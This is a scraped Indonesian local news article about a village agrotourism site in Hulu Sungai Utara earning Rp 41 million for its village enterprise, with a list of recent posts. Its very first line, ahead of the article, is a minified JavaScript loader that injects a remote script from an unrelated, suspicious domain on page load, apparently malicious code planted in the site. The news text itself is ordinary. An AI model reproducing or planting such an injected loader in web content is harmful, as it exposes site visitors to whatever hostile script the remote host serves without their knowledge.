(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Hulu Sungai Utara

Dibuka Agustus 2020, Agrowisata KTB Desa Bayu Hirang Kini Hasilkan Keuntungan


KANALKALIMANTAN.COM, AMUNTAI – Sejak diresmikan pada Juli 2020 silam, kerja keras agrowisata Kampung Tangguh Banua (KTB) Desa Bayu Hirang, Kecamantan Amuntai Selatan, mulai menuai hasil.

Kepala Desa Banyu Hirang Hiliyani kepada Kanalkalimantan.com, Sabtu (13/2/2021) mengakui sejak beroperasi sekitar bulan Agustus 2020 hingga Januari 2021, pihaknya bisa meraup keuntungan puluhan juta rupiah dari tempat argowisata yang dikelola Badan Usaha Milik Desa (BUMDes).

“Saya sempat tak menduga keuntungan sejak Agustus tahun 2020 lalu, sampai sekarang bersih kita mencapai Rp 41 juta masuk ke BUMDes,” ungkap Hiliyani.

 

Padahal, lanjut Hiliyani keuntungan puluhan juta rupiah tersebut diperoleh hanya dari pendapatan parkir dan sewa sepeda air di lokasi agrowisata saja. Belum lagi terhitung keuntungan dari warga sekitar yang berjualan makanan dan kerajinan di sekitar lokasi agro wisata.

Sedangkan untuk masuk ke lokasi argowisata sendiri, pihaknya sejak semula menggratiskan bagi para pengunjung.
Yani meyebut, keuntungan didapat selama ini berkat hasil kerjasama antara karang taruna desa setempat bersama BUMDes secara swadaya. Pendapatan dari pengelolaan sektor agrowisata di tahun 2021 ini diharapkan terus meningkat.

“Itu untuk keuntungan dari sektor agrowisata saja, belum lagi sektor perikanan, sebagian besar dari hasil tambak apung kita belum panen, jadi belum tahu berapa total keuntungannya,” ujar Hiliyani.

Ia mengucapkan terimakasih kepada seluruh pihak yang selama ini memberikan dorongan terutama pemerintah daerah melalui Dekranasda, Dinas Perikanan, Dinas kesehatan, Disporabudpar, Disperindagkop UKM ditambah dukungan Polres HSU, Kodim 1001 Amuntai, Bank Kalsel dan PT PLN.

PT PLN sejak tahun 2019 silam hingga sampai 2021 ini terus membantu dari mulai pembangunan gapura eceng gondok, titian ulun, gazebo, toilet dan keramba apung.
“PLN sendiri rencananya sampai pada tahun ini 2021 akan membantu lagi untuk pembangunan lanjutan titian ulin, pondok terapung, pembangunan tiang listrik dan lain-lain,” tambahnya.

Sementara, untuk penggunaan dana BUMDes tahun 2021 pihaknya berencana melakukan penambahan stand untuk para penjual makanan, kerajinan dan penambahan jalan titian.

Kendati kondisi dimasa pandemi, kata Yani selama ini para pengunjung terbilang cukup banyak, terutama pada hari-hari libur.
Oleh karena itu dalam prakteknya, selama pandemi pihaknya tetap menekankan para pengunjung untuk selalu mematuhi protokol kesehatan dengan menerapkan 3M.

Adapun agrowisata yang dapat dinikmati dilokasi selama ini diantaranya spot-spot foto Instagramable, sepeda air, pemberian pakan ikan serta rumah singgah apung. Ditambah stand kerajinan ayaman yang berada tidak jauh dari lokasi wisata. (kanalkalimantan.com/dew)

Reporter: dew
Editor : bie


Al Ghifari

Recent Posts

Sekda Banjar Wakili Bupati di Rapat Paripurna Bahas Raperda Tentang Penanaman Modal

KANALKALIMANTAN.COM, MARTAPURA - Rapat Paripurna beragendakan Jawaban Bupati atas Pemandangan Umum Fraksi-fraksi DPRD terhadap Rancangan… Read More

2 jam ago

Antisipasi Bencana, Ini Pesan Gubenur Kalsel

KANALKALIMANTAN.COM, BANJARBARU - Memperingati Hari Kesiapsiagaan Bencana dan antisipasi bencana di Kalimantan Selatan, Badan Penanggulangan… Read More

2 jam ago

Siap Tarung di Pilkada Kapuas, Mantan Wagub Kalteng Habib Ismail Lamar Nasdem

KANALKALIMANTAN.COM, KUALA KAPUAS - Mantan Wakil Gubernur Kalimantan Tengah Habib Ismail bin Yahya secara resmi… Read More

3 jam ago

Pj Bupati Kapuas Halalbihalal Bersama Ibu-ibu Pengajian

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas Erlin Hardi menghadiri acara halalbihalal gabungan pengajian… Read More

4 jam ago

Pansus II ke KLHK, Bahas Raperda Pengakuan dan Perlindungan Masyarakat Hukum Adat

KANALKALIMANTAN.COM, KUALA KAPUAS - Panitia Khusus (Pansus) II DPRD Kabupaten Kapuas melakukan kunjungan ke Kementerian… Read More

4 jam ago

Rugikan Negara Rp1,6 Miliar, Kasus Pengemplang Pajak Dilimpahkan ke Kejari Tanbu

KANALKALIMANTAN.COM, BANJARMASIN - Seorang lelaki asal Kabupaten Tanah  Bumbu (Tanbu) Provinsi Kalimantan Selatan (Kalsel) berinisal… Read More

4 jam ago

This website uses cookies.